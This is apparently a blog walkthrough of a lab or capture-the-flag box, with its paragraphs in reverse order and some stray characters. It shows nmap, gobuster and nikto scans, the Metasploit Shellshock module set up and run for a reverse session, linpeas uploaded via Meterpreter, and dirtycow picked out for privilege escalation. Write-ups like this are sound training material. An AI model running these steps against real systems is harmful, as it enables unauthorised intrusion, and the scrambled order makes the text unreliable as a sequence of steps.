1/5/2024 0 Comments Meterpreter explit suggester![]() ╔══════════╣ Executing Linux Exploit Suggester There was a litany of other potential vulnerabilities but I knew the name of this one already, so figured it was probably the way to go here. I was also kind of surprised to not find a working Metasploit module for this one. local.txt -> /home/me/local.txtĬhecking out the linpeas output, I noticed immediately that the machine was vulnerable against the infamous dirtycow privilege escalation route. uploading : /var/www/html/linpeas.sh -> /tmp Meterpreter > upload /var/www/html/linpeas.sh /tmp I wanted to get some info about the system, bring over my linpeas.sh script for enumerating weaknesses and exploits, and also grab the low privilege user flag. msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run I crossed my fingers and ran the dang thing. Msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost 192.168.195.87 Msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/test. I wanted the exploit with the best reliability so I chose the following module, rated “excellent” and set the following options: msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost tun0 I wanted the exploit with the best reliability, and chose this one, rated “excellent”: msfconsoleġ exploit/multi/http/apache_mod_cgi_bash_env_exec excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) + End Time: 22:18:58 (GMT-4) (301 seconds)Īlright, well I am feeling lazy so I’m going to use Metasploit for this. + 8725 requests: 0 error(s) and 13 item(s) reported on remote host + OSVDB-112004: /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability (). + OSVDB-112004: /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability (). + Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Mon May 11 13:55:10 2020 (extraneous information removed below, denoted with markers) └─$ nikto -h 192.168.195.87 I like to scan all webservers with Nikto secondarily, so I gave this a shot. └─$ gobuster dir -u -w /usr/share/wordlists/dirbuster/ I run a gobuster directory enumeration scan but don’t seem to return anything too interesting on the surface. Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds ![]() Service Info: OS: Linux CPE: cpe:/o:linux:linux_kernel |_http-server-header: Apache/2.2.22 (Ubuntu) ![]() |_http-title: Site doesn't have a title (text/html). Not shown: 65533 closed tcp ports (conn-refused)Ģ2/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux protocol 2.0) I started by running my standard nmap scan.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |